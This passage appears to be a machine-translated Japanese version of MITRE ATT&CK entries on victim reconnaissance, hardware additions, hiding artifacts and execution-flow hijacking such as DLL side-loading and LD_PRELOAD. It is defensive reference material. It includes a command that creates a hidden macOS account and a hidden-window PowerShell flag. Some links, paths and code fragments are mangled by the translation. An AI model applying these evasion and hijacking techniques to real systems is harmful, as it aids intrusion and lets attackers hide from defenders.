敵対者は、[Active Scanning](https://attack.mitre.org/techniques/T1595)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)による直接的な収集活動など、さまざまな方法でこの情報を収集することができます。また、ネットワークトポロジーに関する情報は、オンラインやその他のアクセス可能なデータセットを介して敵対者に公開されることもあります(例:[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))。(引用:DNS Dumpster) このような情報を集めることで、他の形態の偵察の機会が得られるかもしれません(例:[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)など)、運用資源の確立(例:[Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)や[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)など)、初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)など)の機会があるかもしれません。
246
T1590.003 被害者のネットワーク情報を集めるネットワークの信頼性の依存関係 敵対者は、ターゲティングの際に使用できる、被害者のネットワーク信頼関係に関する情報を収集することがあります。

敵対者は、[Phishing for Information](https://attack.mitre.org/techniques/T1598)を介して直接情報を引き出すなど、さまざまな方法でこの情報を収集することができます。また、ネットワークの信頼性に関する情報は、オンラインやその他のアクセス可能なデータセットを介して敵対者に公開されることもあります(例:[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))。(引用:Pentesting AD Forests) この情報を収集することで、他の形式の偵察の機会を得ることができるかもしれません(例:[Active Scanning](https://attack.mitre.org/techniques/T1595)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)など)、運用資源の確立(例:[Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)や[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)など)、そして初期アクセス(例:[Trusted Relationship](https://attack.mitre.org/techniques/T1199)など)。
247
T1591 被害者組織の情報収集 敵対者は、ターゲティングの際に利用できる被害者の組織に関する情報を収集することがあります。

敵対者は、[Phishing for Information](https://attack.mitre.org/techniques/T1598)を使って直接情報を聞き出すなど、さまざまな方法でこの情報を収集することがあります。また、組織に関する情報は、オンラインまたはその他のアクセス可能なデータセットを介して敵対者に公開されることもあります(例:[Social Media](https://attack.mitre.org/techniques/T1593/001)または[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))。(引用:ThreatPost Broadvoice Leak)(引用:DOB Business Lookup) このような情報を収集することで、他の形態の偵察の機会が得られる可能性があります(例:[Phishing for Information](https://attack.mitre.org/techniques/T1598)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)など)、運用リソースの確立(例:[Establish Accounts](https://attack.mitre.org/techniques/T1585)や[Compromise Accounts](https://attack.mitre.org/techniques/T1586))、初期アクセス(例:[Phishing](https://attack.mitre.org/techniques/T1566)や[Trusted Relationship](https://attack.mitre.org/techniques/T1199))などの機会が得られるかもしれない。
248
T1591.002 被害者組織の情報を集めるビジネスリレーションシップ 敵対者は、ターゲティングの際に利用できる、被害者のビジネス関係に関する情報を収集することがあります。組織のビジネス関係に関する情報には、接続された(昇格した可能性のある)ネットワークアクセスを持つ第二または第三の組織/ドメイン(マネージドサービスプロバイダ、請負業者など)を含む、さまざまな詳細情報が含まれます。

敵対者は、[Phishing for Information](https://attack.mitre.org/techniques/T1598)によって直接情報を引き出すなど、さまざまな方法でこれらの情報を収集します。ビジネス関係の情報は、オンラインまたはその他のアクセス可能なデータセットを介して敵対者に公開されることもあります(例:[Social Media](https://attack.mitre.org/techniques/T1593/001)または[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))。(引用:ThreatPost Broadvoice Leak) この情報を収集することで、他の形態の偵察の機会が得られる可能性があります(例:[Phishing for Information](https://attack.mitre.org/techniques/T1598)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)など)、運用資源の確立(例:[Establish Accounts](https://attack.mitre.org/techniques/T1585)や[Compromise Accounts](https://attack.mitre.org/techniques/T1586)など)、初期アクセス(例:[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)、[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)、[Trusted Relationship](https://attack.mitre.org/techniques/T1199)など)の機会が得られるかもしれない。
249
T1591.001 被害者の組織情報の収集物理的な場所を特定する 敵対者は、標的化の際に利用できる被害者の物理的な場所を収集することがあります。ターゲット組織の物理的な場所に関する情報には、主要なリソースやインフラがどこにあるかなど、さまざまな詳細情報が含まれます。

敵対者は、[Phishing for Information](https://attack.mitre.org/techniques/T1598)を介して直接情報を引き出すなど、様々な方法でこの情報を収集することができます。また、オンラインまたはその他のアクセス可能なデータセットを介して、標的組織の物理的な場所が敵対者に公開されることもあります(例:[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)または[Social Media](https://attack.mitre.org/techniques/T1593/001))。(引用:ThreatPost Broadvoice Leak)(引用:DOB Business Lookup) この情報を収集することで、他の形態の偵察の機会が得られる可能性があります(例:[Phishing for Information](https://attack.))。mitre.org/techniques/T1598)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)など)、運用リソースの確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)や[Obtain Capabilities](https://attack.mitre.org/techniques/T1588)など)、初期アクセス(例:[Phishing](https://attack.mitre.org/techniques/T1566)や[Hardware Additions](https://attack.mitre.org/techniques/T1200)など)の機会があるかもしれません。
250
T1591.003 犠牲者の組織情報の収集ビジネス・テンポの確認 敵対者は、ターゲティングの際に利用できる、被害者のビジネステンポに関する情報を収集することがあります。組織のビジネステンポに関する情報には、営業時間や曜日など、さまざまな詳細情報が含まれる場合があります。

敵対者は、[Phishing for Information](https://attack.mitre.org/techniques/T1598)によって直接情報を引き出すなど、さまざまな方法でこの情報を収集します。また、ビジネステンポに関する情報は、オンラインまたはその他のアクセス可能なデータセット(例:[Social Media](https://attack.mitre.org/techniques/T1593/001)または[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))を介して敵対者に公開されることもあります。(引用:ThreatPost Broadvoice Leak) この情報を収集することで、他の形態の偵察の機会が得られる可能性があります(例:[Phishing for Information](https://attack.mitre.org/techniques/T1598)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)など)や、運用資源の確立(例:[Establish Accounts](https://attack.mitre.org/techniques/T1585)や[Compromise Accounts](https://attack.mitre.org/techniques/T1586)など)や、初期アクセス(例:[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)や[Trusted Relationship](https://attack.mitre.org/techniques/T1199)など)の機会を得ることができる。
251
T1591.004 被害者組織の情報を集める役割の特定 敵対者は、標的化の際に利用可能な、被害者組織内のアイデンティティや役割に関する情報を収集することがあります。業務上の役割に関する情報は、重要人物の識別可能な情報や、どのようなデータ/リソースにアクセスできるかなど、標的となりうるさまざまな詳細を明らかにする可能性があります。

敵対者は、[Phishing for Information](https://attack.mitre.org/techniques/T1598)を介して直接情報を聞き出すなど、さまざまな方法でこの情報を収集する可能性があります。また、業務上の役割に関する情報は、オンラインまたはその他のアクセス可能なデータセット(例:[Social Media](https://attack.mitre.org/techniques/T1593/001)または[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))を介して敵対者に公開されることもあります。(引用:ThreatPost Broadvoice Leak) この情報を収集することで、他の形態の偵察の機会が得られる可能性があります(例:[Phishing for Information](https://attack.mitre.org/techniques/T1598)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)のような偵察、運用資源の確立([Establish Accounts](https://attack.mitre.org/techniques/T1585)や[Compromise Accounts](https://attack.mitre.org/techniques/T1586)のような)、初期アクセス([Phishing](https://attack.mitre.org/techniques/T1566)のような)の機会が得られるかもしれません。
252
T1200 ハードウェアの追加 敵対者は、コンピュータ・アクセサリ、コンピュータ、ネットワーク・ハードウェアをシステムやネットワークに導入し、それをアクセスのための手段として利用することがあります。APTグループによる使用例はあまり公表されていませんが、多くのペネトレーションテスト担当者は、初期アクセスのためにハードウェアを追加して活用しています。商用およびオープンソースの製品は、パッシブなネットワーク盗聴(引用:Ossmann Star 2011年2月)、マンインザミドルの暗号解読(引用:Aleks Weapons 2015年11月)、キーストロークインジェクション(引用:Hak5 RubberDuck 2016年12月)、DMAによるカーネルメモリの読み取り(引用:Frisk DMA 2016年8月)、既存のネットワークへの新たな無線アクセスの追加(引用:McMillan Pwn 2012年3月)などの機能を持って活用されています。 253
T1564 アーティファクトを隠す 敵対者は、検知を逃れるために、自分の行動に関連するアーティファクトを隠そうとすることがあります。オペレーティングシステムには、ユーザの作業環境を混乱させないように、またユーザがシステム上のファイルや機能を変更できないように、重要なシステムファイルや管理タスクの実行など、さまざまな人工物を隠す機能が備わっている場合があります。敵対者は、これらの機能を悪用して、ファイル、ディレクトリ、ユーザーアカウント、その他のシステムアクティビティなどの人工物を隠し、検知を回避する可能性があります。(引用:Sofacy Komplex Trojan)(引用:Cybereason OSX Pirrit)(引用:MalwareBytes ADS July 2015)

また、敵対者は、仮想化技術を使用するなどして、一般的なセキュリティ機器から隔離されたコンピューティング領域を作成することで、悪意のある行動に関連する人工物を隠そうとする可能性があります。(引用:Sophos Ragnar May 2020)
254
T1564.005 アーティファクトを隠す。隠しファイルシステム 敵対者は、ユーザーやセキュリティツールから悪意のある行為を隠すために、隠しファイルシステムを使用することがあります。ファイルシステムは、物理的なストレージからデータを保存し、アクセスするための構造を提供します。通常、ユーザは、物理的な場所(例:ディスクセクタ)を抽象化したファイルやディレクトリへのアクセスを可能にするアプリケーションを通じて、ファイルシステムに関与します。標準的なファイルシステムには、FAT、NTFS、ext4、APFSなどがある。ファイルシステムには、NTFSのVBR(Volume Boot Record)やMFT(Master File Table)など、他の構造を含むこともあります。(引用:MalwareTech VFS Nov 2014)

敵対者は、感染したシステム上に存在する標準的なファイルシステムとは別に、独自の抽象化されたファイルシステムを使用することがあります。そうすることで、敵対者は、悪意のあるコンポーネントの存在やファイルの入出力をセキュリティツールから隠すことができます。隠しファイルシステムは、仮想ファイルシステムと呼ばれることもあり、さまざまな方法で実装することができます。1つの実装方法は、ディスク構造や標準的なファイルシステムのパーティションで使用されていない予約済みのディスク領域にファイルシステムを格納することです(引用:MalwareTech VFS Nov 2014)(引用:FireEye Bootkits) 別の実装方法は、敵対者が自分のポータブル・パーティション・イメージを標準的なファイルシステムの上にファイルとしてドロップすることです(引用:ESET ComRAT May 2020) また、敵対者は、既存のファイルシステム構造の中で、非標準的な方法でファイルを断片化することもあります(引用:Kaspersky Equation QA)。
255
T1564.001 アーティファクトを隠す隠しファイルと隠しディレクトリ 敵対者は、検知メカニズムを回避するために、ファイルやディレクトリを隠すように設定することがあります。通常のユーザーがシステム上の特別なファイルを誤って変更してしまうことを防ぐために、ほとんどのオペレーティングシステムには「隠しファイル」という概念があります。これらのファイルは、ユーザーがGUIでファイルシステムを閲覧したり、コマンドラインで通常のコマンドを使用する際には表示されません。

LinuxやMacでは、ファイル名やフォルダー名の最初の文字に「.」を付けるだけで、特定のファイルを隠しファイルとしてマークすることができます(引用:Sofacy Komplex Trojan)(引用:Antiquated Mac Malware)。ピリオド「.」で始まるファイルやフォルダは、デフォルトでは、Finderアプリケーションや「ls」などの標準的なコマンドラインユーティリティでは表示されません。

また、macOS上のファイルにUF_HIDDENフラグを設定することで、Finder.appでは表示されないが、Terminal.appでは表示されるようになります(引用:WireLurker)。Windowsでは、ユーザーはattrib.exeバイナリを使用して特定のファイルを隠しファイルとしてマークすることができます。多くのアプリケーションでは、これらの隠しファイルや隠しフォルダを作成して情報を保存し、ユーザーのワークスペースを乱さないようにしています。

敵対者はこれを利用して、システム上の任意の場所にファイルやフォルダを隠し、隠しファイルの調査を含まない典型的なユーザーやシステムの分析を回避することができます。
256
T1564.002 アーティファクトを隠す隠れたユーザー 敵対者は、自分が作成したユーザーアカウントの存在を隠すために、隠しユーザーを使用することがあります。macOSのすべてのユーザーアカウントには、それに関連するuserIDがあります。

<code>/Library/Preferences/com.apple.loginwindow</code>には、<code>Hide500Users</code>というプロパティ値があり、userIDが500以下のユーザーがログイン画面に表示されないようになっています。500以下のuserIDで[Create Account](https://attack.mitre.org/techniques/T1136)という手法を使った場合(例:<code>sudo dscl .-create /Users/username UniqueID 401</code>)、このプロパティを有効(Yesに設定)にすると、敵対者はユーザーアカウントを隠すことができます。(引用元:Cybereason OSX Pirrit)。)
257
T1564.003 アーティファクトを隠す。隠し窓 敵対者は、隠しウィンドウを使用して、ユーザーの目に触れないように悪意のある行為を隠すことがあります。場合によっては、アプリケーションが操作を行う際に通常表示されるウィンドウを隠すことができます。

Windowsでは、[PowerShell](https://attack.mitre.org/techniques/T1059/001)、Jscript、[Visual Basic](https://attack.mitre.org/techniques/T1059/005)などのWindowsのスクリプト言語には、ウィンドウを隠すためのさまざまな機能があります。その一例として、<code>powershell.exe -WindowStyle Hidden</code>があります。(引用:PowerShell About 2019)

同様に、macOSでは、アプリケーションの実行方法に関する設定は、プロパティリスト(plist)ファイルに記載されています。これらのファイルのタグの1つに<code>apple.awt.UIElement</code>があり、JavaアプリケーションがアプリケーションのアイコンをDockに表示しないようにすることができます。

敵対者は、これらの機能を悪用して、他の方法では表示されるウィンドウをユーザーから隠し、システム上での敵対者の活動をユーザーに知らせないようにする可能性があります。(引用:Antiquated Mac Malware)
258
T1564.004 アーティファクトを隠す。NTFSファイルの属性 侵入者は、NTFSのファイル属性を利用して、悪意のあるデータを隠し、検知を逃れることがあります。新技術ファイルシステム(NTFS)フォーマットのパーティションには、パーティション上のすべてのファイル/ディレクトリの記録を保持するマスターファイルテーブル(MFT)があります。(引用:SpectorOps Host-Based Jul 2017)MFTエントリ内には、拡張属性(EA)やデータ(複数のデータ属性が存在する場合はADS(Alternate Data Streams)と呼ばれる)などのファイル属性(引用:Microsoft NTFS File Attributes Aug 2010)があり、任意のデータ(さらには完全なファイル)を格納するために使用することができます。(引用:SpectorOps Host-Based 2017年7月) (引用:Microsoft File Streams) (引用:MalwareBytes ADS 2015年7月) (引用:Microsoft ADS 2014年3月)

敵対者は、悪意のあるデータやバイナリを、ファイルに直接格納するのではなく、ファイル属性のメタデータに格納することがあります。これは、静的インジケータスキャンツールやアンチウイルスなど、一部の防御を回避するために行われることがあります。(引用:IR ZeroAccess NTFS EAへの旅) (引用:MalwareBytes ADS 2015年7月)
259
T1564.006 アーティファクトを隠す。仮想インスタンスの実行 敵対者は、検知されないように仮想インスタンスを使って悪意ある操作を行うことがあります。コンピュータやコンピューティング環境のエミュレーションを可能にする仮想化技術は多種多様に存在します。敵対者は、仮想インスタンス内で悪意のあるコードを実行することで、仮想インスタンス内の活動を監視できないセキュリティツールから自分の行動に関連する成果物を隠すことができます。また、仮想ネットワークの実装(例:ブリッジアダプタ)によっては、IPアドレスやホスト名が既知の値と一致しないため、仮想インスタンスで生成されたネットワークトラフィックを侵害されたホストまで遡ることが困難な場合があります(引用:SingHealth Breach Jan 2019)

敵対者は、仮想化のネイティブサポート(例:Hyper-V)を利用したり、仮想インスタンスの実行に必要なファイル(例:VirtualBoxのバイナリ)をドロップしたりします。仮想インスタンスを実行した後、敵対者はゲストとホストの間に共有フォルダを作成し、仮想インスタンスがホストのファイルシステムとやり取りできるようなパーミッションを設定する可能性があります。(引用:Sophos Ragnar 2020年5月)
260
T1564.007 アーティファクトを隠す。VBAの踏み込み Adversariesは、MS Officeドキュメントに埋め込まれた悪意のあるVisual Basic for Applications (VBA)のペイロードを、VBAのソースコードを良性のデータに置き換えることで隠すことができます。(引用:FireEye VBA stomp Feb 2020)

VBAコンテンツが埋め込まれたMS Officeドキュメントは、モジュールストリーム内にソースコードを格納しています。各モジュールストリームは、p-codeとして知られるVBAソースコードの別のコンパイルされたバージョンを格納する<code>PerformanceCache</code>を持っています。p-codeは、<code>_VBA_PROJECT</code>ストリーム(VBAプロジェクトのバージョン依存の記述を含む)で指定されたMS Officeのバージョンが、ホストMS Officeアプリケーションのバージョンと一致したときに実行されます。(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)

敵対者は、以前にコンパイルされた悪意のあるp-codeを残したまま、VBAソースコードの場所をゼロ、良性のコード、またはランダムなバイトで上書きすることで、悪意のあるVBAコードを隠すことができます。悪意のあるVBAソースコードをスキャンするツールは、不要なコードがコンパイルされたPコードの中に隠されているため、回避される可能性がある。VBAソースコードが削除されると、一部のツールはマクロが存在しないと考えるかもしれない。<code>_VBA_PROJECT</code>ストリームとホストのMS Officeアプリケーションの間にバージョンの一致がある場合は、p-codeが実行されますが、そうでない場合は、良性のVBAソースコードが解凍されてp-codeに再コンパイルされるため、悪意のあるp-codeが削除され、動的解析がバイパスされる可能性があります。(引用:Walmart Roberts 2018年10月)(引用:FireEye VBA stomp 2020年2月)(引用:pcodedmp Bontchev)
261
T1574 ハイジャック実行の流れ 敵対者は、オペレーティングシステムがプログラムを実行する仕組みを乗っ取ることで、独自の悪意あるペイロードを実行することがあります。実行フローのハイジャックは、ハイジャックされた実行が時間の経過とともに再実行される可能性があるため、持続性を目的とすることもあります。

実行の流れをハイジャックする方法は数多くありますが、その中には、オペレーティングシステムが実行するプログラムを探す方法を操作する方法があります。オペレーティング・システムが、プログラムが使用するライブラリを探す方法も、傍受することができます。ファイル・ディレクトリやWindowsの場合はレジストリなど、オペレーティングシステムがプログラムやリソースを探す場所も、悪意のあるペイロードを含むように改ざんされる可能性があります。
262
T1574.012 ハイジャック実行フロー:COR_PROFILER 敵対者は、COR_PROFILER環境変数を利用して、.NET CLRをロードするプログラムの実行フローを乗っ取る可能性があります。COR_PROFILERは、.NET Frameworkの機能の1つで、開発者は、CLR(Common Language Runtime)をロードする各.NETプロセスにロードされるアンマネージド(または.NETの外部)プロファイリングDLLを指定することができます。これらのプロファイラーは、.NET CLRによって実行されるマネージドコードの監視、トラブルシューティング、およびデバッグを行うために設計されています。(引用:Microsoft Profiling 2017年3月)(引用:Microsoft COR_PROFILER 2013年2月)

COR_PROFILER環境変数は、さまざまなスコープ(システム、ユーザー、またはプロセス)で設定することができ、その結果、影響のレベルが異なります。システムおよびユーザー全体の環境変数のスコープはレジストリで指定され、[Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM)オブジェクトをプロファイラDLLとして登録することができます。プロセススコープCOR_PROFILERは、レジストリを変更することなく、メモリ内に作成することもできます。.NET Framework 4からは、環境変数COR_PROFILER_PATHにDLLの場所が指定されていれば、プロファイリングDLLを登録する必要はありません(引用:Microsoft COR_PROFILER 2013年2月)

敵対者はCOR_PROFILERを悪用して、CLRが起動されるたびにすべての.NETプロセスのコンテキストで悪意のあるDLLを実行する永続性を確立する可能性があります。また、COR_PROFILERは、被害者の.NETプロセスが高い権限レベルで実行されている場合に、権限を昇格させたり(例:[Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002))、フックしたり[Impair Defenses](https://attack)したりするためにも使用できます。mitre.org/techniques/T1562)を利用して、.NETプロセスから提供される。(引用:RedCanary Mockingbird 2020年5月号)(引用:Red Canary COR_PROFILER 2020年5月号)(引用:Almond COR_PROFILER 2019年4月号)(引用:GitHub OmerYa Invisi-Shell)(引用:subTee .NET Profilers 2017年5月号)
263
T1574.001 ハイジャック実行フロー:DLL検索順序のハイジャック 敵対者は、DLLのロードに使用される検索順序をハイジャックすることで、独自の悪意のあるペイロードを実行する可能性があります。Windowsシステムでは、プログラムにロードするために必要なDLLを探すために、一般的な方法が用いられています。(引用:Microsoft Dynamic Link Library Search Order)(引用:FireEye Hijacking July 2010) DLLロードのハイジャックは、永続性の確立や、特権の昇格、ファイル実行の制限の回避を目的としている可能性があります。

敵対者がDLLロードをハイジャックする方法は数多くあります。トロイの木馬のようなダイナミックリンクライブラリファイル(DLL)を、プログラムから要求される正規のライブラリよりも先に検索されるディレクトリに仕込み、被害者プログラムから要求されたときにWindowsに悪意のあるライブラリをロードさせることがあります。また、敵対者は、バイナリ・プランティング攻撃とも呼ばれるDLLプリロードを行うことがあります(引用:OWASP Binary Planting)。これは、曖昧に指定されたDLLと同じ名前の悪意のあるDLLを、正規のDLLよりも先にWindowsが検索する場所に配置するものです。多くの場合、この場所はプログラムのカレントワーキングディレクトリです。(引用:FireEye fxsst June 2011)リモートDLLプリロード攻撃は、プログラムがDLLをロードする前に、カレントディレクトリをWeb共有などのリモートの場所に設定することで発生します。(引用:Microsoft Security Advisory 2269637)

敵対者は、DLLリダイレクションによって検索順序を直接変更することもできます。DLLリダイレクションを有効にすると(レジストリでリダイレクションファイルを作成して)、プログラムが別のDLLをロードするようになります。(引用:Microsoft Dynamic-Link Library Redirection)(引用:Microsoft Manifests)(引用:FireEye DLL Search Order Hijacking)

検索順序が脆弱なプログラムがより高い権限レベルで実行されるように設定されている場合、ロードされた敵対者が制御するDLLもより高いレベルで実行されます。この場合、プログラムによっては、ユーザーから管理者やSYSTEMへ、または管理者からSYSTEMへの特権昇格にこの技術が使用される可能性があります。パスハイジャックの被害に遭ったプログラムは、悪意のあるDLLが、置き換えられるはずだった正当なDLLもロードするように設定されている場合があるため、正常に動作しているように見えることがあります。
264
T1574.002 ハイジャック実行フロー:DLLサイドローディング 敵対者は、DLLをサイドロードすることで、独自の悪意のあるペイロードを実行する可能性があります。サイドローディングは、[DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001)と同様に、プログラムがロードするDLLをハイジャックするものです。しかし、プログラムの検索順序にDLLを仕込んで被害者のアプリケーションが起動されるのを待つのではなく、ペイロードを実行する正規のアプリケーションを仕込んで起動することで、ペイロードを直接サイドロードすることができます。

サイドローディングは、ローダが使用するDLLの検索順序を利用して、被害者のアプリケーションと悪意のあるペイロードの両方を並べて配置します。敵対者は、サイドローディングを、正当で信頼できる、潜在的に昇格したシステムやソフトウェアプロセスの下で実行するアクションを隠す手段として使用します。ペイロードのサイドロードに使用される良性の実行ファイルは、配信時や実行時にフラグが立てられないことがあります。また、ペイロードは、信頼されたプロセスのメモリにロードされるまで、暗号化/パッケージ化されたり、難読化されたりすることがあります。 引用:FireEye DLL サイドローディング
265
T1574.004 ハイジャックの実行フロー:Dylibのハイジャック 敵対者は、被害者のアプリケーションが実行時に検索するパスに、予想される名前の悪意のあるダイナミックライブラリ(dylib)を配置して、独自のペイロードを実行することがあります。ダイナミックローダーは、検索パスの連続した順序に基づいて、dylibを見つけようとします。dylibsへのパスには<code>@rpath</code>というプレフィックスが付くことがあります。これは、開発者が相対パスを使用して、実行ファイルの場所に基づいて実行時に使用される検索パスの配列を指定できるようにするためです。 さらに、<code>LC_LOAD_WEAK_DYLIB</code>関数のような弱いリンクが使用されている場合、期待されるdylibが存在しなくても、アプリケーションは実行されます。弱くリンクすることで、開発者は、新しいAPIが追加されても、複数のmacOSバージョンでアプリケーションを実行することができます。

敵対者は、特定されたパスに欠落したdylibの名前を持つ悪意のあるdylibを挿入することで実行権を得ることができます。(引用:Wardle Dylib Hijack Vulnerable Apps)(引用:Wardle Dylib Hijacking OSX 2015)(引用:Github EmpireProject HijackScanner)(引用:Github EmpireProject CreateHijacker Dylib) Dylibがアプリケーションのアドレス空間にロードされることで、悪意のあるdylibがアプリケーションの特権レベルやリソースを継承することができます。アプリケーションによっては、特権の昇格やネットワークへの無制限のアクセスが可能になります。また、この方法では、正規のプロセスの下で実行が隠蔽されるため、セキュリティ製品の検出を回避できる可能性があります。(引用元:Writing Bad Malware for OSX)(引用元:Wardle artofmalware volume1)(引用元:MalwareUnicorn macOS Dylib Injection MachO)
266
T1574.006 ハイジャック実行フロー:ダイナミックリンカーハイジャック 敵対者は、ダイナミックリンカーが共有ライブラリをロードする際に使用する環境変数を乗っ取ることで、独自の悪意のあるペイロードを実行する可能性があります。ダイナミックリンカーは、プログラムの実行準備段階で、環境変数や、Linuxの<code>LD_PRELOAD</code>やmacOSの<code>DYLD_INSERT_LIBRARIES</code>などのファイルから、指定した絶対パスの共有ライブラリをロードします。環境変数で指定されたライブラリは、同じ機能名を持つシステムライブラリよりも優先的にロードされます。(引用:Man LD.SO)(引用:TLDP Shared Libraries)(引用:Apple Doco Archive Dynamic Libraries) これらの変数は、開発者が再コンパイルすることなくバイナリをデバッグしたり、マッピングされたシンボルをデコンフリクトさせたり、元のライブラリを変更することなくカスタム関数を実装したりするためによく使われます。(引用:Baeldung LD_PRELOAD)

Linux および macOS において、ダイナミックリンカー変数をハイジャックすることで、被害者プロセスのメモリ、システム/ネットワークリソースへのアクセスが可能になり、場合によっては昇格権限が与えられることがあります。また、この方法では、正当なプロセスの下で実行が隠蔽されるため、セキュリティ製品の検出を回避できる可能性があります。敵対者は、<code>export</code>コマンド、<code>setenv</code>関数、または<code>putenv</code>関数を使用して、コマンドラインから環境変数を設定することができます。また、敵対者は[Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006)を利用して、シェルで変数をエクスポートしたり、Pythonの<code>os.environ</code>のような高レベルの構文を使ってプログラムで変数を設定したりすることができます。

Linuxでは、攻撃者が<code>LD_PRELOAD</code>を設定して、被害者プログラムが要求する正規のライブラリ名と一致する悪意のあるライブラリを指し示すことで、被害者プログラムの実行時にOSに攻撃者の悪意のあるコードを読み込ませることがあります。 <code>LD_PRELOAD</code>は、環境変数や<code>/etc/ld.so.preload</code>で設定できます。so.preload</code>ファイルで設定することができる。(引用:Man LD.SO)(引用:TLDP Shared Libraries) <code>LD_PRELOAD</code>で指定されたライブラリは、<code>dlopen()</code>や<code>mmap()</code>によって、それぞれメモリにロード、マップされる。(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle)(Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers)

macOSでは、この動作は概念的にはLinuxと同じであり、macOSのダイナミックライブラリ(dyld)が低レベルでどのように実装されているかという点のみが異なります。侵入者は、環境変数<code>DYLD_INSERT_LIBRARIES</code>を設定して、犠牲者のプログラムが要求する正当なライブラリや関数の名前を含む悪意のあるライブラリを指すようにすることができます。(引用: TheEvilBit DYLD_INSERT_LIBRARIES)(引用: Timac DYLD_INSERT_LIBRARIES)(引用: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass)
267
T1574.005 ハイジャック実行の流れ:実行可能なインストーラーファイルのパーミッションの弱点 敵対者は、インストーラが使用するバイナリをハイジャックして、独自の悪意のあるペイロードを実行することがあります。これらのプロセスは、その機能の一部として、または他のアクションを実行するために、特定のバイナリを自動的に実行することがあります。対象となるバイナリを含むファイルシステムのディレクトリのパーミッションや、バイナリ自体のパーミッションが不適切に設定されている場合、対象となるバイナリがユーザーレベルのパーミッションを使用した別のバイナリで上書きされ、元のプロセスによって実行される可能性があります。元のプロセスやスレッドがより高い権限レベルで実行されている場合、置き換えられたバイナリもSYSTEMを含むより高い権限レベルで実行されます。

この手法の別のバリエーションとして、実行形式の自己解凍型インストーラに共通する弱点を利用して実行することができます。インストーラは、インストールプロセス中に、<code>%TEMP%</code>ディレクトリ内のサブディレクトリを使用して、DLL、EXE、その他のペイロードなどのバイナリを展開するのが一般的です。インストーラがサブディレクトリやファイルを作成する際に、書き込みアクセスを制限する適切なパーミッションを設定しないことが多く、サブディレクトリに置かれた信頼できないコードの実行や、インストールプロセスで使用されるバイナリの上書きが可能になります。この動作は、[DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001)に関連しており、これを利用している可能性があります。

敵対者は、より高い権限レベルでコードを実行する手段として、この手法を用いて正規のバイナリを悪意のあるバイナリに置き換える可能性があります。また、インストーラの中には、敵が制御するコードを実行する際に特権の昇格を必要とするものがあります。この動作は、[Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)に関連しています。既存の一般的なインストーラにおけるこの弱点の例が、ソフトウェアベンダーにいくつか報告されています。(引用: mozilla_sec_adv_2012) (引用: Executable Installers are Vulnerable) 実行プロセスが、特定の時間または特定のイベント(例: システムの起動)の間に実行されるように設定されている場合、この手法は永続化のためにも使用できます。
268
T1574.007 ハイジャック実行フロー:環境変数PATHによるパスインターセプト 敵対者は、ライブラリのロードに使用される環境変数をハイジャックすることで、独自の悪意のあるペイロードを実行することがあります。敵対者は、PATH環境変数に格納されているディレクトリのリストの前のエントリにプログラムを配置し、Windowsがスクリプトやコマンドラインから呼び出されたバイナリを探してPATHリストを順次検索するときに実行することができます。

PATH環境変数にはディレクトリのリストが含まれています。プログラムを実行する特定の方法(cmd.exeやコマンドラインを使用する方法)では、プログラムのパスが指定されていない場合にプログラムを検索する場所を決定するために、PATH環境変数のみに依存しています。PATH環境変数に、Windowsのディレクトリである<code>%SystemRoot%\system32</code>よりも前に、何らかのディレクトリがリストアップされている場合(例,<code>C:Windows\system32</code>)、その前のディレクトリにWindowsプログラム(cmd、PowerShell、Pythonなど)と同じ名前のプログラムが置かれ、そのコマンドがスクリプトやコマンドラインから実行されたときに実行されることがあります。

例えば、PATH環境変数に<code>C:example path</code>が</code>C:Windows\system32</code>より前にある場合、<code>C:example path</code>に置かれたnet.exeという名前のプログラムは、コマンドラインから "net "を実行したときに、Windowsシステムの "net "の代わりに呼び出されます。
269
T1574.008 ハイジャック実行フロー:検索順序ハイジャックによるパスインターセプト 敵対者は、他のプログラムをロードする際の検索順序を乗っ取ることで、独自の悪意のあるペイロードを実行することがあります。プログラムの中には、フルパスで他のプログラムを呼び出さないものがあるため、敵対者は、呼び出し元のプログラムがあるディレクトリに自分のファイルを置き、呼び出し元のプログラムの要求に応じてOSに悪意のあるソフトウェアを起動させることがあります。

